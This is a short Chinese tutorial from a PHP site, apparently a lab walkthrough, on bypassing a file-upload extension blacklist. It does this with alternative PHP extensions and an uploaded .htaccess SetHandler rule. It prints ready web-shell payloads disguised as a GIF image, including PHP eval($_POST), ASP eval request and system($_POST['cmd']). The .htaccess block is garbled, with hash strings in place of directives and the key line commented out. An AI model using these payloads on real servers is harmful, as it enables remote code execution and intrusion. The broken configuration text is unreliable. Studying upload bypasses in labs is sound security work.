這篇文章主要介紹了關於文件上傳繞過黑名單的方法,有著一定的參考價值,現在分享給大家,有需要的朋友可以參考一下
本關主要透過設定上傳後綴,限制asp,php,jsp 等後綴,不允許上傳。
姿勢一:本次繞過方式為修改後綴為.php3,php5等,這裡是黑名單驗證('.asp','.aspx','.php','.jsp') ,我們可上傳php3,php5...等這樣可以被伺服器解析的後綴名稱
#姿勢二:重寫檔案解析規則繞過
# 1.先上傳先上傳一個名為.htaccess
文件,內容如下:
7dbec1342203bda950e5c4d4c26c928b
# SetHandler application/x-httpd-php
d4f50085796fcbc8b99545763f01d848
2、上傳1.jpg腳本
內容:
GIF89a <?php eval($_POST['joker']);?> <%eval request("joker")%> <?php system($_POST['cmd']);?>##########
<span style='margin: 0px; padding: 0px; color: #ff00ff; line-height: 1.5 !important; font-family: "Courier New" !important; font-size: 12px !important'><br>最后查看结果如下:<br><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""><br></span>###以上就是本文的全部內容,希望對大家的學習有所幫助,更多相關內容請關注PHP中文網! ######相關推薦:#########PHP使用Azure Storage Blob上傳檔案###############nginx memcache快取的介紹###### ####
以上是文件上傳繞過黑名單的方法的詳細內容。更多資訊請關注PHP中文網其他相關文章!